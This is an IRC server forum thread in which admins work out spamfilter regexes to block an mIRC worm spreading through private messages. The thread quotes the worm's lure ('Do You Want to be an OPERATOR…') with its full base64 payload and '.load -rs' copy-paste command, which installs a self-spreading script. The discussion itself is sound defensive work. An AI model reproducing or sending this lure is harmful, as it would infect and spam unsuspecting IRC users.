UnrealIRCd Forums

i am having a advertise in my server ... some users do mass pvt ans send this msg .. and who ever types this a file auto creats in his mIRC which sends auto msg who ever join the specific channel ... so how can i add this thing in spamfilter . the advertise msg is :

<sunny> Do You Want to be an OPERATOR in #bangladesh ? copy/paste this->14 //write $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs | //mode

thx in advance

Are you sure you pasted everything?

The following spamfilter would match your message:
or

Dukat thx for the regex but it doesnt work !!

i set the second one u gave as i cant edit conf file now

this is ur exact one :-

/SPAMFILTER ADD cpnNPqa block - Spamming_users_with_an_mIRC_trojan. ^Do You
Want to be an OPERATOR in #.+ \? copy/paste this->.+//write
\$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

and this is where i also add channel name :-

/SPAMFILTER ADD cpnNPqa block - Spamming_users_with_an_mIRC_trojan. ^Do You
Want to be an OPERATOR in #bangladesh \? copy/paste this->.+//write
\$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

none of them worked . donno why

It worked for me...

Are you sure you pasted everything in your first post?


You didn't test it as an oper, right?

BTW: My exact one didn't have cpnNPqa as targets... Don't add targets that are not affected!

Dukat
yeah it worked for me aswell when i tried it with a clone , ofcourse without taking oper ... but after 2/3 mins i found some more users were sending same msg but spamfilter were not blocking their msg's .. i was like what the f*k !!

and as u said while adding spamfilter i added just p in action .. so that it blocks only pvt msg and they were sending the same msg in pvt .. while its added in spamfilter .

donno what the f*k is this thing but its not only happening in my server i found this in some other servers too .. its dangerous as far as i can understand ... and should take some serious actions against it . its still going on and i had to shun or gline my users .. so plz any one get me a way .

/\
||
||
===============================================
That Guest is me GouroB

Well, show us the new version(s)...

Actually I think the 'shun' action was not working properly. So, did you try using block / kill / gline / whatever? ;)

As Dukat says, can you show us the exact command or block you used?

ok here is the cmd structure .. those i used in spamfilter.. and syzop i used block not shun

/SPAMFILTER ADD p block - Spamming_users_with_an_mIRC_trojan. ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

/SPAMFILTER ADD n block - Spamming_users_with_an_mIRC_trojan. ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

i used diff spamfilter for pvt notice and pvt msg .. so that they cant send that msg in pvt by any how . and i didnt add kill/gline coz most of the infected users r unknown from this problem of their scripts . thats y i added only block . am also giving u the /stats f out put in here ....

F n block 0 99344 86400 Spamming_users_with_an_mIRC_trojan. [nAi]![email protected] ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

F p block 0 99827 86400 Spamming_users_with_an_mIRC_trojan. [nAi]![email protected] ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode

works fine here indeed.
Could you paste one of the messages that still get trough when you have these spamfilters?

the same one , just added various colour codes in it ... giving u one of those pvt's in here ... and i found that this msg this started in Dalnet .... and we have a room there called #bangladesh ... so from there when users came to my server things spreaded in here too ,.. one of those add's again in below ...

<Austin> Do You Want to be an OPERATOR in #bangladesh ? copy/paste this-> //write $decode(4b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCA12udGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQ4pIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs | //mode

Hm now that's odd.. get's blocked too here.
So that's in private message, right? Not in channel or anything.
And it's by a non-oper? (well, of course ;p).

Any pattern in them (the ones that get trough), like are they always/often from the same server? Or anything else?

What Unreal version are you on?

But I'm afraid I'll have no idea really...

syzop ,
those 2 spamfilter blocks .. almost 75 % of add's as i can get notice of soamfiletr in snotice window ... and some they cant block . but all of them r same msg's . just new colour codes .

am using unreal 3.2.2 ..... les hope for the best now .. what else can be done !

I thought the spamfilter filtered out control codes before checking the string...

stealth ..

I thought the spamfilter filtered out control codes before checking the string...

umm i donno what u exactly meant but its not perfectly working ... isnt there any other way ?